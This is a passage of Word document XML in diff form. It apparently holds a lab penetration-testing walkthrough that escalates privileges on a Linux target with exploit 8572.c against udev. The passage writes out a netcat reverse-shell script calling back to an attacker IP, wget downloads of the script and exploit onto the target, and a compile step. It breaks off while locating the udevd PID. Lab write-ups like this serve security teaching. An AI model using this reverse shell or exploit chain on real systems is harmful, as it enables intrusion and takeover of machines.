+        <w:t>/exploits/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>linux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/local/8572.c /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/www/html/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>Preparing a run File</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>The exploit will execute the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>/run</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t> file on the target, so we need to make it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We'll use a simple </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> reverse shell.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>On Kali, execute this command.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>nano</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/www/html/run</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>nano</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>, enter these lines, replacing the IP address with the address of your Kali machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>#!/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.23.131 12345 -e /bin/bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>Uploading the Files</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>On Kali, in your low-privilege shell, execute these commands to upload the files to the target. Replace the IP address with the IP address of your Kali machine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>cd /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>wget</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> http://192.168.23.131/run</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>wget</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> http://192.168.23.131/8572.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08F0F33F" wp14:editId="73673765">
+            <wp:extent cx="5943600" cy="1414780"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2" name="图片 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1414780"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EF4DD3F" wp14:editId="5155D3A8">
+            <wp:extent cx="5943600" cy="1099185"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="3" name="图片 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1099185"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>Compiling the Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t xml:space="preserve">On Kali, in your low-privilege shell, execute these commands to compile the exploit </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>gcc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -o exploit 8572.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>Finding the PID</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The exploit documentation said that we needed the process identifier (PID) of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>udevd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t>netlink</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> socket.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t xml:space="preserve">On Kali, in your low-privilege shell, execute these commands to list network processes, and the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t>udev</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> process.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTML"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
